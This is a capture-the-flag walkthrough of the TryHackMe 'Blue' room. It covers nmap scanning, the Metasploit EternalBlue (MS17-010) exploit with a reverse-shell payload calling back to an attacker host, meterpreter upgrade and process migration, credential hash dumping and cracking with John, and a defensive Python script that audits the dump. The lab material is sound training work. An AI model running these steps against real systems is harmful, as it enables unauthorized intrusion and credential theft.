# Blue

![tryhackme.com - © TryHackMe](/files/tJ1nmhBpP5d28MPTPPHA)

***

## Intro

| Room Info            | ![](/files/rF2TXiJYX1oqGtech1Rg)        |
| -------------------- | --------------------------------------- |
| 🔗 Name              | [Blue](https://tryhackme.com/room/blue) |
| 🎯 Target IP         | `10.10.177.175`                         |
| 📈 Difficulty level  | 🟢Easy                                  |
| 💲 Subscription type | Free                                    |
| 🪟 OS                | Windows                                 |

***

## Recon

```bash
nmap -p1-1000 10.10.177.175
nmap -sV -p445 10.10.177.175
nmap --script smb-vuln-ms17-010 -p445 10.10.177.175
```

***

## Exploitation

```bash
msfconsole -q
```

```bash
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set RHOSTS 10.10.177.175
set LHOST 10.18.65.48
# LHOST = tun0 VPN interface IP
run

background # or CTRL+Z
```

![](/files/On8SOLWk129M9w7GV56n)

***

## Privilege Escalation

* The payload used was `windows/x64/shell/reverse_tcp`, which only gives a plain command shell, so upgrade the session to a `meterpreter` shell.

```bash
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
sessions
set SESSION 2
run
```

![](/files/5a0NpUeslmknh2fidqUt)

```bash
sessions 5
getuid
	Server username: NT AUTHORITY\SYSTEM
ps
```

* The current process may not be running as `SYSTEM`. Pick the `PID` (process ID) of a process owned by `NT AUTHORITY\SYSTEM` and migrate into it, e.g. `1284` (`spoolsv.exe`).

```bash
migrate 1284
```

![](/files/YoSZ2tDrWeUbVSuOfLCA)

***

## Post Exploitation

### Cracking

```bash
hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:
```

`aad3b435b51404eeaad3b435b51404ee` is the LM hash of an ***empty password***; it is what appears when the system stores no LM hash for the account.
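To make the dump format above concrete, here is an added example (not part of the original writeup) that parses `hashdump` lines in the `<Username>:<User ID>:<LM hash>:<NT hash>:...` layout and reports what a defender would look for: accounts with a blank password (NT hash of the empty string, `31d6cfe0d16ae931b73c59d7e0c089c0`), accounts that still store a real LM hash, and accounts sharing one NT hash. The sample input is the three lines from the dump; all function and field names are this example's own.

```python
"""Audit a pwdump-style hash dump for weak-credential indicators.

Added example, not part of the original writeup.  Parses lines in the
<user>:<rid>:<LM hash>:<NT hash>:<comment>:<home dir>: format and flags
blank passwords, stored LM hashes and password reuse across accounts.
"""
from __future__ import annotations

from dataclasses import dataclass

# Well-known values: the LM and NT hashes of the empty string.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: the three lines from the hashdump output shown above.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""


@dataclass
class HashEntry:
    username: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def stores_lm_hash(self) -> bool:
        # Anything other than the empty-string LM hash means LM storage is
        # enabled for this account; LM hashes are trivially recoverable.
        return self.lm_hash != EMPTY_LM_HASH

    @property
    def blank_password(self) -> bool:
        # The NT hash of "" means the account has an empty password
        # (typical for disabled built-ins, dangerous on an enabled account).
        return self.nt_hash == EMPTY_NT_HASH


def _check_hex32(lineno: int, name: str, value: str) -> None:
    if len(value) != 32 or any(c not in "0123456789abcdef" for c in value):
        raise ValueError(f"line {lineno}: {name} hash is not 32 hex characters")


def parse_hashdump(text: str) -> list[HashEntry]:
    """Parse pwdump-format lines; blank lines and '#' comments are skipped."""
    entries: list[HashEntry] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            raise ValueError(f"line {lineno}: expected at least 4 colon-separated fields")
        user, rid, lm, nt = fields[0], fields[1], fields[2].lower(), fields[3].lower()
        _check_hex32(lineno, "LM", lm)
        _check_hex32(lineno, "NT", nt)
        entries.append(HashEntry(user, int(rid), lm, nt))
    return entries


def audit(entries: list[HashEntry]) -> dict[str, list[str]]:
    """Return findings keyed by category; each value is a list of usernames."""
    findings: dict[str, list[str]] = {
        "blank_password": [],
        "lm_hash_stored": [],
        "shared_nt_hash": [],
    }
    by_nt: dict[str, list[str]] = {}
    for e in entries:
        if e.blank_password:
            findings["blank_password"].append(e.username)
        if e.stores_lm_hash:
            findings["lm_hash_stored"].append(e.username)
        by_nt.setdefault(e.nt_hash, []).append(e.username)
    # The same non-empty NT hash on several accounts means one password is reused.
    for nt, users in by_nt.items():
        if nt != EMPTY_NT_HASH and len(users) > 1:
            findings["shared_nt_hash"].extend(users)
    return findings


if __name__ == "__main__":
    for category, users in audit(parse_hashdump(SAMPLE_DUMP)).items():
        print(f"{category}: {', '.join(users) or '-'}")
```

Run against the sample dump, the audit reports `Administrator` and `Guest` as blank-password accounts (their NT hash is the empty-string hash), no stored LM hashes, and no reuse; on a real host the blank-password list is the one to reconcile against which of those accounts are actually enabled.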

```bash
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > jonhash.txt

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jonhash.txt
```

`ffb43f0de35be4d9917ac0cc8ad57f8d` is the NTLM hash for `alqfna22`.

Jon's credentials are `jon`:`alqfna22`.

![](/files/XSUowEJkcZM7uKrcZrmN)

## Flags

* 🚩 In the `meterpreter` session

```bash
cd C:\\
dir
cat flag1.txt
flag{*******************
```

![](/files/TUHZXeANY0ZGDlKfRKZk)

```bash
cd C:/Windows/System32/config
cat flag2.txt
flag{*****************************
```

![](/files/kK03goiVsuliSfX9ncID)

```bash
cd C:\\Users\\
dir
cd Jon
cd Documents
cat flag3.txt
flag{********************************
```

![](/files/oIOBWFOVCoPQm7Oo48ce)

***